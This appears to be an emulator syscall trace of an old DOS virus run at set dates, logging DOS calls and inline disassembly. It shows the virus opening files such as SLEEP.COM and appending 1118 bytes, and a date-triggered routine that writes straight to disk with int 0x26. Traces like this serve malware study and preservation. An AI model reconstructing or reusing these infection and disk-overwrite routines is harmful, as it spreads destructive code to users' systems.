2018-12-25T12:39:37.5387085Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:37.542107044Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:37.546516799Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:37.547649234Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:37.568521312Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.575552518Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:37.582513494Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:37.585388033Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:37.602666575Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:37.603967978Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:37.60907514Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:37.61370152Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.616395528Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:37.619448011Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:37.620965657Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.623460277Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:37.633227473Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.638338489Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:37.639741853Z	62	PC: 12d0b | Close file
2018-12-25T12:39:37.648590966Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:37.660741265Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:37.66355628Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.67098288Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.680088764Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.68257069Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.693984723Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.696402825Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:37.703948044Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.707094107Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.710672122Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.713682563Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.715815526Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.71942439Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.729718425Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.732168615Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.734244159Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.743490908Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:37.754682134Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:37.758737376Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:37.763547608Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:37.770624901Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:37.772791471Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:37.783927562Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:37.785765763Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:37.792926209Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:37.796274225Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:37.798975278Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:37.802547903Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:37.807863747Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.810307868Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:37.819704472Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:37.823088646Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:37.825257835Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:37.83404631Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:37.845588181Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:37.847950606Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:37.852344895Z	59	PC: 12d9e | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":13945,"SideJobID":0}

.

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:39:38.710808466Z	42	PC: 12a5a | Get date 0x12a5a: cmp dl, 2 0x12a5d: je 0x12a61 0x12a5f: jmp 0x12a7e 0x12a61: cli 0x12a62: mov ah, 2 0x12a64: cdq 0x12a65: mov cx, 0x100 0x12a68: int 0x26 0x12a6a: jmp 0x12a6c 0x12a6c: cli 0x12a6d: mov al, 3 0x12a6f: mov cx, 0x2bc 0x12a72: mov dx, 0 0x12a75: mov ds, word ptr [di + 0x63] 0x12a78: mov bx, word ptr [di + 0x37] 0x12a7b: call 0x22a61 0x12a7e: ret 0x12a7f: lodsb al, byte ptr [si] 0x12a80: xor al, ah 0x12a82: stosb byte ptr es:[di], al
2018-12-25T12:39:38.71385429Z	71	PC: 12b46 | Get current directory
2018-12-25T12:39:38.717127222Z	59	PC: 12b51 | Change current directory
2018-12-25T12:39:38.721230018Z	26	PC: 12c04 | Set disk transfer address
2018-12-25T12:39:38.731827199Z	78	PC: 12c12 | Find first file
2018-12-25T12:39:38.740366467Z	61	PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:38.746939913Z	63	PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:39:38.753744735Z	44	PC: 12c88 | Get time 0x12c88: add dl, dh 0x12c8a: je 0x12c84 0x12c8c: mov si, 0x115 0x12c8f: add si, word ptr [0x106] 0x12c93: mov byte ptr [si], dl 0x12c95: mov ax, 0x4301 0x12c98: xor cx, cx 0x12c9a: mov dx, si 0x12c9c: add dx, 0xc7 0x12ca0: int 0x21 0x12ca2: mov ah, 0x3e 0x12ca4: int 0x21 0x12ca6: mov ax, 0x3d02 0x12ca9: int 0x21 0x12cab: jb 0x12c5e 0x12cad: mov di, dx 0x12caf: add di, 0x63 0x12cb2: stosw word ptr es:[di], ax 0x12cb3: xchg ax, bx 0x12cb4: mov ah, 0x40
2018-12-25T12:39:38.756485359Z	67	PC: 12ca2 | Get or set file attributes
2018-12-25T12:39:39.08109746Z	62	PC: 12ca6 | Close file
2018-12-25T12:39:39.083197338Z	61	PC: 12cab | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:39.090658432Z	64	PC: 12cbe | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:39:39.093694589Z	64	PC: 12cd0 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:39.10158071Z	64	PC: 12ce5 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:39:39.104751579Z	66	PC: 12cee | Move file pointer
2018-12-25T12:39:39.108641907Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.110798834Z	64	PC: 12a95 | Write file or device (Write 1118 bytes on handle 5)
2018-12-25T12:39:39.11987336Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.122337629Z	87	PC: 12d07 | Get or set file date and time
2018-12-25T12:39:39.124046988Z	62	PC: 12d0b | Close file
2018-12-25T12:39:39.132229297Z	67	PC: 12d1c | Get or set file attributes
2018-12-25T12:39:39.143843964Z	79	PC: 12c25 | Find next file
2018-12-25T12:39:39.146646853Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:39.154369022Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:39.160661371Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:39.16270978Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:39.173311464Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:39.182633029Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:39.189318531Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:39.192439213Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:39.19609375Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:39.198643851Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:39.205670095Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.208046765Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:39.22175668Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.223971724Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:39.239657766Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:39.247441472Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:39.257234737Z	79	PC: 12c25 | Find next file (See above)
2018-12-25T12:39:39.260553236Z	61	PC: 12c3d | Open file (See above)
2018-12-25T12:39:39.267826983Z	63	PC: 12c4f | Read file or device (See above)
2018-12-25T12:39:39.274348012Z	44	PC: 12c88 | Get time (See above)
2018-12-25T12:39:39.277634199Z	67	PC: 12ca2 | Get or set file attributes (See above)
2018-12-25T12:39:39.287526677Z	62	PC: 12ca6 | Close file (See above)
2018-12-25T12:39:39.28988839Z	61	PC: 12cab | Open file (See above)
2018-12-25T12:39:39.297513046Z	64	PC: 12cbe | Write file or device (See above)
2018-12-25T12:39:39.300458053Z	64	PC: 12cd0 | Write file or device (See above)
2018-12-25T12:39:39.3032362Z	64	PC: 12ce5 | Write file or device (See above)
2018-12-25T12:39:39.306755551Z	66	PC: 12cee | Move file pointer (See above)
2018-12-25T12:39:39.307776605Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.309330252Z	64	PC: 12a95 | Write file or device (See above)
2018-12-25T12:39:39.315190968Z	42	PC: 12a5a | Get date (See above)
2018-12-25T12:39:39.316871477Z	87	PC: 12d07 | Get or set file date and time (See above)
2018-12-25T12:39:39.31804196Z	62	PC: 12d0b | Close file (See above)
2018-12-25T12:39:39.323978359Z	67	PC: 12d1c | Get or set file attributes (See above)
2018-12-25T12:39:39.330183324Z	42	PC: 12b6c | Get date 0x12b6c: cmp dx, 0x606 0x12b70: je 0x12b75 0x12b72: jmp 0x12d8c 0x12b75: jmp 0x12d21 0x12b78: and ah, bh 0x12b7a: movsw word ptr es:[di], word ptr [si] 0x12b7b: mov ax, 0x5c4c 0x12b7e: add word ptr [di], ax 0x12b80: add byte ptr [di - 0x75], dl 0x12b83: in al, dx 0x12b84: sub sp, 0x2c 0x12b87: push si 0x12b88: jmp 0x12bf9 0x12b8a: mov ah, 0x1a 0x12b8c: lea dx, word ptr [bp - 0x2c] 0x12b8f: int 0x21 0x12b91: mov ah, 0x4e 0x12b93: mov cx, 0x10 0x12b96: mov dx, 0x1b5 0x12b99: add dx, word ptr [0x106]
2018-12-25T12:39:39.331716772Z	59	PC: 12d97 | Change current directory
2018-12-25T12:39:39.337938767Z	59	PC: 12d9e | Change current directory